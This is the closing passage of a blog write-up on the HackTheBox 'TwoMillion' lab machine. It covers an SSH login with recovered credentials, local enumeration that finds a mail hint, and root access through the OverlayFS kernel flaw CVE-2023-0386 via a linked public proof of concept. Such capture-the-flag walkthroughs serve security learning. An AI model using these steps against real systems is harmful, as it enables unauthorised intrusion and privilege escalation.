</span></span></code></pre></div><figure><img src=/img/two-million/mysql-users.webp></figure><p>Nothing specific.</p><p>Let&rsquo;s try ssh using the username and the password we got.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> ssh admin@10.10.11.221
</span></span><span style=display:flex><span>admin@10.10.11.221s password:
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>admin@2million:~$ id
</span></span><span style=display:flex><span>uid<span style=color:#fe8019>=</span>1000<span style=color:#fe8019>(</span>admin<span style=color:#fe8019>)</span> gid<span style=color:#fe8019>=</span>1000<span style=color:#fe8019>(</span>admin<span style=color:#fe8019>)</span> groups<span style=color:#fe8019>=</span>1000<span style=color:#fe8019>(</span>admin<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>admin@2million:~$ whoami
</span></span><span style=display:flex><span>admin
</span></span><span style=display:flex><span>admin@2million:~$ cat user.txt
</span></span><span style=display:flex><span>****************************
</span></span></code></pre></div><figure><img src=/img/two-million/ssh.webp></figure><p>Alright we got logged in as <code>admin</code> user.</p><hr><h2 id=privilege-escalation><a href=#privilege-escalation class=anchor-head aria-label=Anchor></a>Privilege Escalation</h2><h3 id=local-enumeration-1><a href=#local-enumeration-1 class=anchor-head aria-label=Anchor></a>Local Enumeration</h3><p>First things first:</p><figure><img src=/img/two-million/sudo-test.webp></figure><p>After some enumeration found <code>/var/mail/admin</code> file is readable by the admin user and may contain something interesting I mean exposition:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>admin@2million:~$ find / -type f -user admin -readable 2&gt;/dev/null
</span></span></code></pre></div><figure><img src=/img/two-million/readable-files.webp></figure><p>As I said, not so creative but considering the burden of being an easy box it is okay&mldr;</p><figure><img src=/img/two-million/mail.webp></figure><p>After searching a bit about OverlayFS kernel exploits I found this one: <a href=https://nvd.nist.gov/vuln/detail/CVE-2023-0386>CVE-2023-0386</a></p><h3 id=privilege-escalation-vector><a href=#privilege-escalation-vector class=anchor-head aria-label=Anchor></a>Privilege Escalation vector</h3><h4 id=cve-2023-0386><a href=#cve-2023-0386 class=anchor-head aria-label=Anchor></a>CVE 2023 0386</h4><p>Check this awesome <a href=https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/>blog</a> from <a href=https://securitylabs.datadoghq.com/>Datadog Security Labs</a> to know more about the exploit. We can use this <a href=https://github.com/sxlmnwb/CVE-2023-0386>POC</a> to exploit the vulnerability.</p><p>Looks like someone already did it for me and forgot to clean it up:</p><figure><img src=/img/two-million/poc-in-tmp.webp></figure><p>Anyway&mldr;</p><p>We can use it to exploit and escalate into the root user:</p><figure><img src=/img/two-million/poc-readme.webp></figure><p>Since the machine have <code>tmux</code> already installed, we can use it to run the exploits in two seperate window:</p><figure><img src=/img/two-million/exploit.webp></figure><p>And that&rsquo;s it, we got the root shell!!</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>root@2million:/# whoami
</span></span><span style=display:flex><span>root
</span></span><span style=display:flex><span>root@2million:/# id
</span></span><span style=display:flex><span>uid<span style=color:#fe8019>=</span>0<span style=color:#fe8019>(</span>root<span style=color:#fe8019>)</span> gid<span style=color:#fe8019>=</span>0<span style=color:#fe8019>(</span>root<span style=color:#fe8019>)</span> groups<span style=color:#fe8019>=</span>0<span style=color:#fe8019>(</span>root<span style=color:#fe8019>)</span>,1000<span style=color:#fe8019>(</span>admin<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>root@2million:/# cat /root/root.txt
</span></span><span style=display:flex><span>****************************
</span></span><span style=display:flex><span>root@2million:/#
</span></span></code></pre></div><figure><img src=/img/two-million/root.webp></figure><hr><p>Overall this was a fun easy box. I was able to get into the working of the api by checking the php files and it was fun. There&rsquo;s also a fun easter egg kind of thing hidden inside the root directory, so if you are interested try to find it out yourself. This box also helped me to learn more about <code>CVE-2023-0386</code>. Maybe I will write about the vulnerability in detail in some other blog.</p></div></article></main><aside id=sticky-top><div class=toc-title><p>TwoMillion | HackTheBox</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><ul><li><a href=#overview>Overview</a></li></ul></li><li><a href=#information-gathering>Information Gathering</a><ul><li><a href=#port-80---http-nginx>Port 80 - HTTP (Nginx)</a></li></ul></li><li><a href=#exploitation>Exploitation</a><ul><li><a href=#rce>RCE</a></li></ul></li><li><a href=#lateral-movement-to-user>Lateral Movement to user</a><ul><li><a href=#local-enumeration>Local Enumeration</a></li><li><a href=#source-code-analysis>Source code analysis:</a></li><li><a href=#lateral-movement-vector>Lateral Movement vector</a></li></ul></li><li><a href=#privilege-escalation>Privilege Escalation</a><ul><li><a href=#local-enumeration-1>Local Enumeration</a></li><li><a href=#privilege-escalation-vector>Privilege Escalation vector</a></li></ul></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2023-07-26</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/hack-the-box/><p class=alert-heading>Hack the Box Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/precious/><div class=nav-arrow>Previous in series</div><span class=post-title>Precious | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/perfection/><div class=nav-arrow>Next in series</div><span class=post-title>Perfection | HackTheBox</span></a></nav></div><nav class=post-nav><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/precious/><div class=nav-arrow>Previous</div><span class=post-title>Precious | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/perfection/><div class=nav-arrow>Next</div><span class=post-title>Perfection | HackTheBox</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>